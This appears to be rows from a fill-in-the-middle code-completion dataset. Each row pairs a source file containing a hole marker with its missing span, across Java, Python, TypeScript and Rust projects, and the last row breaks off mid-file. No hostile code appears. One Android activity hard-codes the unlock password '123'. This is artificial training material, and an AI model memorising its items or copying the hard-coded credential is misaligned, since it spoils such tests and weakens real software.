prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>ServiceOperatorRepository.java<|end_file_name|><|fim▁begin|>/**
* Copyright (C) 2012-2016 52°North Initiative for Geospatial Open Source
* Software GmbH
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*
* If the program is linked with libraries which are licensed under one of
* the following licenses, the combination of the program with the linked
* library is not considered a "derivative work" of the program:
*
* - Apache License, version 2.0
* - Apache Software License, version 1.0
* - GNU Lesser General Public License, version 3
* - Mozilla Public License, versions 1.0, 1.1 and 2.0
* - Common Development and Distribution License (CDDL), version 1.0
*
* Therefore the distribution of the program linked with libraries licensed
* under the aforementioned licenses, is permitted by the copyright holders
* if the distribution is compliant with both the GNU General Public
* License version 2 and the aforementioned licenses.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
* Public License for more details.
*/
package org.n52.sos.service.operator;
import java.util.Collections;
import java.util.Map;
import java.util.Set;
import org.n52.sos.exception.ConfigurationException;
import org.n52.sos.ogc.ows.OwsExceptionReport;
import org.n52.sos.request.operator.RequestOperatorRepository;
import org.n52.sos.util.AbstractConfiguringServiceLoaderRepository;
import org.n52.sos.util.CollectionHelper;
import org.n52.sos.util.MultiMaps;
import org.n52.sos.util.SetMultiMap;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
/**
* @author Christian Autermann <[email protected]>
*
* @since 4.0.0
*/
public class ServiceOperatorRepository extends AbstractConfiguringServiceLoaderRepository<ServiceOperator> {
private static class LazyHolder {
private static final ServiceOperatorRepository INSTANCE = new ServiceOperatorRepository();
private LazyHolder() {};
}
/**
* Implemented ServiceOperator
*/
private final Map<ServiceOperatorKey, ServiceOperator> serviceOperators = Maps.newHashMap();
/** supported SOS versions */
private final SetMultiMap<String, String> supportedVersions = MultiMaps.newSetMultiMap();
/** supported services */
private final Set<String> supportedServices = Sets.newHashSet();
/**
* Load implemented request listener
*
* @throws ConfigurationException
* If no request listener is implemented
*/
private ServiceOperatorRepository() throws ConfigurationException {
super(ServiceOperator.class, false);
load(false);
}
public static ServiceOperatorRepository getInstance() {
return LazyHolder.INSTANCE;
}
/**
* Load the implemented request listener and add them to a map with
* operation name as key
*
* @param implementations
* the loaded implementations
*
* @throws ConfigurationException
* If no request listener is implemented
*/
@Override
protected void processConfiguredImplementations(final Set<ServiceOperator> implementations)
throws ConfigurationException {
serviceOperators.clear();
supportedServices.clear();
supportedVersions.clear();
for (final ServiceOperator so : implementations) {
serviceOperators.put(so.getServiceOperatorKey(), so);
supportedVersions.add(so.getServiceOperatorKey().getService(), so.getServiceOperatorKey()
.getVersion());
supportedServices.add(so.getServiceOperatorKey().getService());
}
}
/**
* Update/reload the implemented request listener
*
* @throws ConfigurationException
* If no request listener is implemented
*/
@Override
public void update() throws ConfigurationException {
RequestOperatorRepository.getInstance().update();
super.update();
}
/**
* @return the implemented request listener
*/
public Map<ServiceOperatorKey, ServiceOperator> getServiceOperators() {
return Collections.unmodifiableMap(serviceOperators);
}
public Set<ServiceOperatorKey> getServiceOperatorKeyTypes() {
return getServiceOperators().keySet();
}
public ServiceOperator getServiceOperator(final ServiceOperatorKey sok) {
return serviceOperators.get(sok);
}
/**<|fim▁hole|> * @param service
* the service
* @param version
* the version
* @return the implemented request listener
*
*
* @throws OwsExceptionReport
*/
public ServiceOperator getServiceOperator(final String service, final String version) throws OwsExceptionReport {
return getServiceOperator(new ServiceOperatorKey(service, version));
}
/**
* @return the supportedVersions
*
* @deprecated use getSupporteVersions(String service)
*/
@Deprecated
public Set<String> getSupportedVersions() {
return getAllSupportedVersions();
}
public Set<String> getAllSupportedVersions() {
return CollectionHelper.union(supportedVersions.values());
}
/**
* @param service
* the service
* @return the supportedVersions
*
*/
public Set<String> getSupportedVersions(final String service) {
if (isServiceSupported(service)) {
return Collections.unmodifiableSet(supportedVersions.get(service));
}
return Sets.newHashSet();
}
/**
* @param version
* the version
* @return the supportedVersions
*
* @deprecated use isVersionSupported(String service, String version)
*/
@Deprecated
public boolean isVersionSupported(final String version) {
return getAllSupportedVersions().contains(version);
}
/**
* @param service
* the service
* @param version
* the version
* @return the supportedVersions
*
*/
public boolean isVersionSupported(final String service, final String version) {
return isServiceSupported(service) && supportedVersions.get(service).contains(version);
}
/**
* @return the supportedVersions
*/
public Set<String> getSupportedServices() {
return Collections.unmodifiableSet(supportedServices);
}
public boolean isServiceSupported(final String service) {
return supportedServices.contains(service);
}
}<|fim▁end|> | |
<|file_name|>test_set_start_page01.py<|end_file_name|><|fim▁begin|>###############################################################################
#
# Tests for XlsxWriter.<|fim▁hole|># Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'set_start_page01.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/printerSettings/printerSettings1.bin',
'xl/worksheets/_rels/sheet1.xml.rels']
self.ignore_elements = {'[Content_Types].xml': ['<Default Extension="bin"'],
'xl/worksheets/sheet1.xml': ['<pageMargins']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with printer settings."""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet = workbook.add_worksheet()
worksheet.set_start_page(1)
worksheet.set_paper(9)
worksheet.write('A1', 'Foo')
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
unittest.main()<|fim▁end|> | # |
<|file_name|>slope.py<|end_file_name|><|fim▁begin|><|fim▁hole|>import numpy as np
import sys
import scipy
from scipy import stats
data_file = sys.argv[1]
data = np.loadtxt(data_file)
slope, intercept, r_value, p_value, std_err = stats.linregress(data[499:2499,0], data[499:2499,1])
nf = open('linear_reg.dat', 'w')
nf.write("Linear Regression for data between %5d ps (frame: 499) and %5d ps (frame 2499) \n" %(data[499][0], data[2499][0]))
nf.write("slope: %10.5E Angstrom^2 ps^-1 \n" %(slope))
nf.write("intercept: %10.5E Angstrom^2\n" %(intercept))
nf.write("R^2: %10.5f \n" %(r_value**2))
nf.write('Diffusion coeff: %10.5E Angstrom^2 ps^-1$ \n' %(slope/6.0))
nf.write('Diffusion coeff: %10.5E m^2 s^-1$ \n' %(slope*10**(-8)/6.0))
nf.close()<|fim▁end|> | #!/Library/Frameworks/Python.framework/Versions/2.7/bin/python
|
<|file_name|>EnterPwdActivity.java<|end_file_name|><|fim▁begin|>package mobilesafe.dda.com.activity;
import android.app.Activity;
import android.content.Intent;<|fim▁hole|>import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.EditText;
import com.dda.mobilesafe.utils.UIUtils;
/**
* Created by nuo on 2016/6/28.
* Created by 11:27.
* 描述:输入密码的界面
*/
public class EnterPwdActivity extends Activity implements OnClickListener {
private EditText et_pwd;
private Button bt_0;
private Button bt_1;
private Button bt_2;
private Button bt_3;
private Button bt_4;
private Button bt_5;
private Button bt_6;
private Button bt_7;
private Button bt_8;
private Button bt_9;
private Button bt_clean_all;
private Button bt_delete;
private Button bt_ok;
private String packageName;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_set_pwd);
initUI();
}
private void initUI() {
Intent intent = getIntent();
if (intent != null) {
packageName = intent.getStringExtra("packageName");
}
et_pwd = (EditText) findViewById(R.id.et_pwd);
bt_0 = (Button) findViewById(R.id.bt_0);
bt_1 = (Button) findViewById(R.id.bt_1);
bt_2 = (Button) findViewById(R.id.bt_2);
bt_3 = (Button) findViewById(R.id.bt_3);
bt_4 = (Button) findViewById(R.id.bt_4);
bt_5 = (Button) findViewById(R.id.bt_5);
bt_6 = (Button) findViewById(R.id.bt_6);
bt_7 = (Button) findViewById(R.id.bt_7);
bt_8 = (Button) findViewById(R.id.bt_8);
bt_9 = (Button) findViewById(R.id.bt_9);
bt_ok = (Button) findViewById(R.id.bt_ok);
bt_ok.setOnClickListener(this);
bt_clean_all = (Button) findViewById(R.id.bt_clean_all);
bt_delete = (Button) findViewById(R.id.bt_delete);
//隐藏当前的键盘
et_pwd.setInputType(InputType.TYPE_NULL);
// 清空
bt_clean_all.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
et_pwd.setText("");
}
});
// 删除
bt_delete.setOnClickListener(new OnClickListener() {
private String str;
@Override
public void onClick(View v) {
str = et_pwd.getText().toString();
if (str.length() == 0) {
return;
}
et_pwd.setText(str.substring(0, str.length() - 1));
}
});
bt_0.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_0.getText().toString());
}
});
bt_1.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_1.getText().toString());
}
});
bt_2.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_2.getText().toString());
}
});
bt_3.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_3.getText().toString());
}
});
bt_4.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_4.getText().toString());
}
});
bt_5.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_5.getText().toString());
}
});
bt_6.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_6.getText().toString());
}
});
bt_7.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_7.getText().toString());
}
});
bt_8.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_8.getText().toString());
}
});
bt_9.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_9.getText().toString());
}
});
}
@Override
public void onClick(View v) {
switch (v.getId()) {
case R.id.bt_ok:
String result = et_pwd.getText().toString();
if ("123".equals(result)) {
// 如果密码正确。说明是自己人
/**
* 是自己家人。不要拦截他
*/
//System.out.println("密码输入正确");
Intent intent = new Intent();
// 发送广播。停止保护
intent.setAction("com.dda.mobilesafe.stopprotect");
// 跟狗说。现在停止保护信息
intent.putExtra("packageName", packageName);
sendBroadcast(intent);
finish();
} else {
UIUtils.showToast(EnterPwdActivity.this, "密码错误");
}
break;
}
}
@Override
public void onBackPressed() {
// 当用户输入后退健 的时候。我们进入到桌面
Intent intent = new Intent();
intent.setAction("android.intent.action.MAIN");
intent.addCategory("android.intent.category.HOME");
intent.addCategory("android.intent.category.DEFAULT");
intent.addCategory("android.intent.category.MONKEY");
startActivity(intent);
}
}<|fim▁end|> | import android.os.Bundle;
import android.text.InputType;
import android.view.View; |
<|file_name|>evmctl-tests.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.<|fim▁hole|>#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
#
# Copyright: 2021 IBM
# Author: Nageswara R Sastry <[email protected]>
import os
from avocado import Test
from avocado.utils import archive, process
from avocado.utils.software_manager import SoftwareManager
class EvmCtl(Test):
"""
evmctl-testsuite
:avocado: tags=security,testsuite
"""
def setUp(self):
'''
Install the basic packages to support evmctl
'''
# Check for basic utilities
smm = SoftwareManager()
deps = ['gcc', 'make']
for package in deps:
if not smm.check_installed(package) and not smm.install(package):
self.cancel('%s is needed for the test to be run' % package)
url = "https://sourceforge.net/projects/linux-ima/files/latest/download"
tarball = self.fetch_asset(name="download.tar.gz", locations=url, expire='7d')
archive.extract(tarball, self.workdir)
self.sourcedir = os.path.join(self.workdir, os.listdir(self.workdir)[0])
self.log.info("sourcedir - %s" % self.sourcedir)
os.chdir(self.sourcedir)
process.run('./autogen.sh', ignore_status=True)
def test(self):
'''
Running tests from evmctl
'''
count = 0
output = process.system_output('./build.sh', ignore_status=True).decode()
for line in reversed(output.splitlines()):
if '# FAIL' in line:
count = int(line.split(":")[1].strip())
self.log.info(line)
break
# If the fail count is more than 0 then there are some failed tests
if count:
self.fail("%s test(s) failed, please refer to the log" % count)<|fim▁end|> | |
<|file_name|>settings.tsx<|end_file_name|><|fim▁begin|>import Form from './reuse/form';
import Input from './reuse/input';
import { BreadCrumb } from './reuse/breadcrumb';
import { GET_SETTINGS, GfycatClientSettingsFromRender, SETTINGS_CHANGED, RETURN_SETTINGS } from '../settingsHandler';
import * as React from 'react';
import { ipcRenderer } from 'electron';
export default class Settings extends React.Component<any, GfycatClientSettingsFromRender> {
_defaultSettings: GfycatClientSettingsFromRender = {userName: '', apiId: '', password: '', apiSecret: '', paths: []};
constructor(props: any) {
super(props);
this.state = this._defaultSettings;
ipcRenderer.on(RETURN_SETTINGS, (event: any, args: GfycatClientSettingsFromRender) => {
this.updateState(args);
});
}
render() {
return (
<div className='container'>
<h2>Settings</h2>
<Form userName={this.state.userName} paths={this.state.paths} apiId={this.state.apiId} password={this.state.password}
apiSecret={this.state.apiSecret} handleSubmit={this.handleSubmit.bind(this)} />
</div>
);
}
componentDidMount() {
this.getSavedSettings();
}
handleSubmit(event: GfycatClientSettingsFromRender) {
//history.pushState('/', 'Home');
ipcRenderer.send(SETTINGS_CHANGED, event);<|fim▁hole|> }
getSavedSettings() {
ipcRenderer.send(GET_SETTINGS);
}
updateState(value: GfycatClientSettingsFromRender) {
this.setState((prev) => {
let newState = {...prev, ...value};
newState = {...newState, paths: [...value.paths]};
return newState;
});
}
}<|fim▁end|> | this.updateState({...event, password: this.state.password, apiSecret: this.state.apiSecret}); |
<|file_name|>check_duplicate_key.py<|end_file_name|><|fim▁begin|>from __future__ import print_function
import six.moves.cPickle as pickle
import os
import sys
import theano
from six import iteritems, itervalues
DISPLAY_DUPLICATE_KEYS = False
DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE = False
dirs = []
if len(sys.argv) > 1:
for compiledir in sys.argv[1:]:
dirs.extend([os.path.join(compiledir, d) for d in os.listdir(compiledir)])
else:
dirs = os.listdir(theano.config.compiledir)
dirs = [os.path.join(theano.config.compiledir, d) for d in dirs]
keys = {} # key -> nb seen
mods = {}
for dir in dirs:
key = None
try:
f = open(os.path.join(dir, "key.pkl"))
key = f.read()
f.close()
keys.setdefault(key, 0)
keys[key] += 1
del f
except IOError:
# print dir, "don't have a key.pkl file"
pass
try:
path = os.path.join(dir, "mod.cpp")
if not os.path.exists(path):
path = os.path.join(dir, "mod.cu")<|fim▁hole|> mods[mod] += (key,)
del mod
del f
del path
except IOError:
print(dir, "don't have a mod.{cpp,cu} file")
pass
if DISPLAY_DUPLICATE_KEYS:
for k, v in iteritems(keys):
if v > 1:
print("Duplicate key (%i copies): %s" % (v, pickle.loads(k)))
nbs_keys = {} # nb seen -> now many key
for val in itervalues(keys):
nbs_keys.setdefault(val, 0)
nbs_keys[val] += 1
nbs_mod = {} # nb seen -> how many key
nbs_mod_to_key = {} # nb seen -> keys
more_than_one = 0
for mod, kk in iteritems(mods):
val = len(kk)
nbs_mod.setdefault(val, 0)
nbs_mod[val] += 1
if val > 1:
more_than_one += 1
nbs_mod_to_key[val] = kk
if DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE:
m = max(nbs_mod.keys())
print("The keys associated to the mod.{cpp,cu} with the most number of copy:")
for kk in nbs_mod_to_key[m]:
kk = pickle.loads(kk)
print(kk)
print("key.pkl histograph")
l = list(nbs_keys.items())
l.sort()
print(l)
print("mod.{cpp,cu} histogram")
l = list(nbs_mod.items())
l.sort()
print(l)
total = sum(len(k) for k in list(mods.values()))
uniq = len(mods)
useless = total - uniq
print("mod.{cpp,cu} total:", total)
print("mod.{cpp,cu} uniq:", uniq)
print("mod.{cpp,cu} with more than 1 copy:", more_than_one)
print("mod.{cpp,cu} useless:", useless, float(useless) / total * 100, "%")
print("nb directory", len(dirs))<|fim▁end|> | f = open(path)
mod = f.read()
f.close()
mods.setdefault(mod, ()) |
<|file_name|>PCommand.java<|end_file_name|><|fim▁begin|><|fim▁hole|>import org.bukkit.ChatColor;
import org.bukkit.command.Command;
import org.bukkit.command.CommandExecutor;
import org.bukkit.command.CommandSender;
import org.bukkit.entity.Player;
import com.gmail.nossr50.mcMMO;
import com.gmail.nossr50.commands.CommandHelper;
import com.gmail.nossr50.datatypes.PlayerProfile;
import com.gmail.nossr50.events.chat.McMMOPartyChatEvent;
import com.gmail.nossr50.locale.LocaleLoader;
import com.gmail.nossr50.party.Party;
import com.gmail.nossr50.party.PartyManager;
import com.gmail.nossr50.util.Users;
public class PCommand implements CommandExecutor {
private final mcMMO plugin;
public PCommand (mcMMO plugin) {
this.plugin = plugin;
}
@Override
public boolean onCommand(CommandSender sender, Command command, String label, String[] args) {
PlayerProfile profile;
String usage = ChatColor.RED + "Proper usage is /p <party-name> <message>"; //TODO: Needs more locale.
if (CommandHelper.noCommandPermissions(sender, "mcmmo.commands.party")) {
return true;
}
switch (args.length) {
case 0:
if (sender instanceof Player) {
profile = Users.getProfile((Player) sender);
if (profile.getAdminChatMode()) {
profile.toggleAdminChat();
}
profile.togglePartyChat();
if (profile.getPartyChatMode()) {
sender.sendMessage(LocaleLoader.getString("Commands.Party.Chat.On"));
}
else {
sender.sendMessage(LocaleLoader.getString("Commands.Party.Chat.Off"));
}
}
else {
sender.sendMessage(usage);
}
return true;
default:
if (sender instanceof Player) {
Player player = (Player) sender;
Party party = Users.getProfile(player).getParty();
if (party == null) {
player.sendMessage(LocaleLoader.getString("Commands.Party.None"));
return true;
}
StringBuffer buffer = new StringBuffer();
buffer.append(args[0]);
for (int i = 1; i < args.length; i++) {
buffer.append(" ");
buffer.append(args[i]);
}
String message = buffer.toString();
McMMOPartyChatEvent chatEvent = new McMMOPartyChatEvent(player.getName(), party.getName(), message);
plugin.getServer().getPluginManager().callEvent(chatEvent);
if (chatEvent.isCancelled()) {
return true;
}
message = chatEvent.getMessage();
String prefix = ChatColor.GREEN + "(" + ChatColor.WHITE + player.getName() + ChatColor.GREEN + ") ";
plugin.getLogger().info("[P](" + party.getName() + ")" + "<" + player.getName() + "> " + message);
for (Player member : party.getOnlineMembers()) {
member.sendMessage(prefix + message);
}
}
else {
if (args.length < 2) {
sender.sendMessage(usage);
return true;
}
if (!PartyManager.getInstance().isParty(args[0])) {
sender.sendMessage(LocaleLoader.getString("Party.InvalidName"));
return true;
}
StringBuffer buffer = new StringBuffer();
buffer.append(args[1]);
for (int i = 2; i < args.length; i++) {
buffer.append(" ");
buffer.append(args[i]);
}
String message = buffer.toString();
McMMOPartyChatEvent chatEvent = new McMMOPartyChatEvent("Console", args[0], message);
plugin.getServer().getPluginManager().callEvent(chatEvent);
if (chatEvent.isCancelled()) {
return true;
}
message = chatEvent.getMessage();
String prefix = ChatColor.GREEN + "(" + ChatColor.WHITE + "*Console*" + ChatColor.GREEN + ") ";
plugin.getLogger().info("[P](" + args[0] + ")" + "<*Console*> " + message);
for (Player member : PartyManager.getInstance().getOnlineMembers(args[0])) {
member.sendMessage(prefix + message);
}
}
return true;
}
}
}<|fim▁end|> | package com.gmail.nossr50.commands.party;
|
<|file_name|>DemoBase.java<|end_file_name|><|fim▁begin|>package com.xsing.demo;
import android.graphics.Typeface;<|fim▁hole|>
/**
* Baseclass of all Activities of the Demo Application.
*
* @author Philipp Jahoda
*/
public abstract class DemoBase extends FragmentActivity {
protected String[] mMonths = new String[] {
"Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Okt", "Nov", "Dec"
};
protected String[] mParties = new String[] {
"Party A", "Party B", "Party C", "Party D", "Party E", "Party F", "Party G", "Party H",
"Party I", "Party J", "Party K", "Party L", "Party M", "Party N", "Party O", "Party P",
"Party Q", "Party R", "Party S", "Party T", "Party U", "Party V", "Party W", "Party X",
"Party Y", "Party Z"
};
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
}
protected float getRandom(float range, float startsfrom) {
return (float) (Math.random() * range) + startsfrom;
}
@Override
public void onBackPressed() {
super.onBackPressed();
// overridePendingTransition(R.anim.move_left_in_activity, R.anim.move_right_out_activity);
}
}<|fim▁end|> | import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v4.app.FragmentActivity; |
<|file_name|>example.rs<|end_file_name|><|fim▁begin|>use std::iter::FromIterator;
pub struct SimpleLinkedList<T> {
head: Option<Box<Node<T>>>,
len: usize,
}
struct Node<T> {
data: T,
next: Option<Box<Node<T>>>,
}
impl<T> SimpleLinkedList<T> {
pub fn new() -> Self {
SimpleLinkedList { head: None, len: 0 }
}
pub fn is_empty(&self) -> bool {
self.len == 0<|fim▁hole|>
pub fn len(&self) -> usize {
self.len
}
pub fn push(&mut self, element: T) {
let node = Box::new(Node::new(element, self.head.take()));
self.head = Some(node);
self.len += 1;
}
pub fn pop(&mut self) -> Option<T> {
match self.len {
0 => None,
_ => {
self.len -= 1;
self.head.take().map(|node| {
let node = *node;
self.head = node.next;
node.data
})
}
}
}
pub fn peek(&self) -> Option<&T> {
self.head.as_ref().map(|node| &node.data)
}
pub fn rev(self) -> SimpleLinkedList<T> {
let mut rev_list = SimpleLinkedList::new();
let mut vec: Vec<_> = self.into();
for t in vec.drain(..).rev() {
rev_list.push(t);
}
rev_list
}
}
impl<T> FromIterator<T> for SimpleLinkedList<T> {
fn from_iter<I: IntoIterator<Item = T>>(iter: I) -> Self {
let mut sll = SimpleLinkedList::new();
for t in iter {
sll.push(t);
}
sll
}
}
impl<T> From<SimpleLinkedList<T>> for Vec<T> {
fn from(mut linked_list: SimpleLinkedList<T>) -> Vec<T> {
let mut vec: Vec<T> = Vec::with_capacity(linked_list.len());
while let Some(data) = linked_list.pop() {
vec.push(data);
}
vec.reverse();
vec
}
}
impl<T> Node<T> {
pub fn new(element: T, next: Option<Box<Node<T>>>) -> Self {
Node {
data: element,
next,
}
}
}<|fim▁end|> | } |
<|file_name|>regex.js<|end_file_name|><|fim▁begin|>/**
* Regex patterns used through keigai
*
* `url` was authored by Diego Perini
*
* @namespace regex
* @private<|fim▁hole|> after_space: /\s+.*/,
allow: /^allow$/i,
allow_cors: /^access-control-allow-methods$/i,
and: /^&/,
args: /\((.*)\)/,
auth: /\/\/(.*)\@/,
bool: /^(true|false)?$/,
boolean_number_string: /boolean|number|string/,
caps: /[A-Z]/,
cdata: /\&|<|>|\"|\'|\t|\r|\n|\@|\$/,
checked_disabled: /checked|disabled/i,
complete_loaded: /^(complete|loaded)$/i,
csv_quote: /^\s|\"|\n|,|\s$/,
del: /^del/,
domain: /^[\w.-_]+\.[A-Za-z]{2,}$/,
down: /down/,
endslash: /\/$/,
eol_nl: /\n$/,
element_update: /id|innerHTML|innerText|textContent|type|src/,
get_headers: /^(head|get|options)$/,
get_remove_set: /get|remove|set/,
hash: /^\#/,
header_replace: /:.*/,
header_value_replace: /.*:\s+/,
html: /^<.*>$/,
http_body: /200|201|202|203|206/,
http_ports: /80|443/,
host: /\/\/(.*)\//,
ie: /msie|ie|\.net|windows\snt/i,
ip: /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/,
is_xml: /^<\?xml.*\?>/,
json_maybe: /json|plain|javascript/,
json_wrap: /^[\[\{]/,
klass: /^\./,
no: /no-store|no-cache/i,
not_dotnotation: /-|\s/,
not_endpoint: /.*\//,
null_undefined: /null|undefined/,
number: /(^-?\d\d*\.\d*$)|(^-?\d\d*$)|(^-?\.\d\d*$)|number/,
number_format_1: /.*\./,
number_format_2: /\..*/,
number_present: /\d{1,}/,
number_string: /number|string/i,
number_string_object: /number|object|string/i,
object_type: /\[object Object\]/,
patch: /^patch$/,
primitive: /^(boolean|function|number|string)$/,
priv: /private/,
protocol: /^(.*)\/\//,
put_post: /^(post|put)$/i,
question: /(\?{1,})/,
radio_checkbox: /^(radio|checkbox)$/i,
root: /^\/[^\/]/,
select: /select/i,
selector_is: /^:/,
selector_complex: /\s+|\>|\+|\~|\:|\[/,
set_del: /^(set|del|delete)$/,
space_hyphen: /\s|-/,
string_object: /string|object/i,
svg: /svg/,
top_bottom: /top|bottom/i,
trick: /(\%3F{1,})/,
url: /^(?:(?:https?|ftp):\/\/)(?:\S+(?::\S*)?@)?(?:(?!10(?:\.\d{1,3}){3})(?!127(?:\.\d{1,3}){3})(?!169\.254(?:\.\d{1,3}){2})(?!192\.168(?:\.\d{1,3}){2})(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))|(?:(?:[a-z\u00a1-\uffff0-9]+-?)*[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]+-?)*[a-z\u00a1-\uffff0-9]+)*(?:\.(?:[a-z\u00a1-\uffff]{2,})))(?::\d{2,5})?(?:\/[^\s]*)?$/i,
word: /^\w+$/,
xdomainrequest: /^(get|post)$/i,
xml: /xml/i
};<|fim▁end|> | * @type {Object}
*/
let regex = { |
<|file_name|>fs.rs<|end_file_name|><|fim▁begin|>// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Filesystem manipulation operations
//!
//! This module contains basic methods to manipulate the contents of the local
//! filesystem. All methods in this module represent cross-platform filesystem
//! operations. Extra platform-specific functionality can be found in the
//! extension traits of `std::os::$platform`.
#![stable(feature = "rust1", since = "1.0.0")]
use core::prelude::*;
use fmt;
use ffi::OsString;
use io::{self, Error, ErrorKind, SeekFrom, Seek, Read, Write};
use path::{Path, PathBuf};
use sys::fs as fs_imp;
use sys_common::{AsInnerMut, FromInner, AsInner};
use vec::Vec;
/// A reference to an open file on the filesystem.
///
/// An instance of a `File` can be read and/or written depending on what options
/// it was opened with. Files also implement `Seek` to alter the logical cursor
/// that the file contains internally.
///
/// # Examples
///
/// ```no_run
/// use std::io::prelude::*;
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// try!(f.write_all(b"Hello, world!"));
///
/// let mut f = try!(File::open("foo.txt"));
/// let mut s = String::new();
/// try!(f.read_to_string(&mut s));
/// assert_eq!(s, "Hello, world!");
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub struct File {
inner: fs_imp::File,
}
/// Metadata information about a file.
///
/// This structure is returned from the `metadata` function or method and
/// represents known metadata about a file such as its permissions, size,
/// modification times, etc.
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Metadata(fs_imp::FileAttr);
/// Iterator over the entries in a directory.
///
/// This iterator is returned from the `read_dir` function of this module and
/// will yield instances of `io::Result<DirEntry>`. Through a `DirEntry`
/// information like the entry's path and possibly other metadata can be
/// learned.
///
/// # Failure
///
/// This `io::Result` will be an `Err` if there's some sort of intermittent
/// IO error during iteration.
#[stable(feature = "rust1", since = "1.0.0")]
pub struct ReadDir(fs_imp::ReadDir);
/// Entries returned by the `ReadDir` iterator.
///
/// An instance of `DirEntry` represents an entry inside of a directory on the
/// filesystem. Each entry can be inspected via methods to learn about the full
/// path or possibly other metadata through per-platform extension traits.
#[stable(feature = "rust1", since = "1.0.0")]
pub struct DirEntry(fs_imp::DirEntry);
/// An iterator that recursively walks over the contents of a directory.
#[unstable(feature = "fs_walk",
reason = "the precise semantics and defaults for a recursive walk \
may change and this may end up accounting for files such \
as symlinks differently")]
pub struct WalkDir {
cur: Option<ReadDir>,
stack: Vec<io::Result<ReadDir>>,
}
/// Options and flags which can be used to configure how a file is opened.
///
/// This builder exposes the ability to configure how a `File` is opened and
/// what operations are permitted on the open file. The `File::open` and
/// `File::create` methods are aliases for commonly used options using this
/// builder.
///
/// Generally speaking, when using `OpenOptions`, you'll first call `new()`,
/// then chain calls to methods to set each option, then call `open()`, passing
/// the path of the file you're trying to open. This will give you a
/// [`io::Result`][result] with a [`File`][file] inside that you can further
/// operate on.
///
/// [result]: ../io/type.Result.html
/// [file]: struct.File.html
///
/// # Examples
///
/// Opening a file to read:
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().read(true).open("foo.txt");
/// ```
///
/// Opening a file for both reading and writing, as well as creating it if it
/// doesn't exist:
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new()
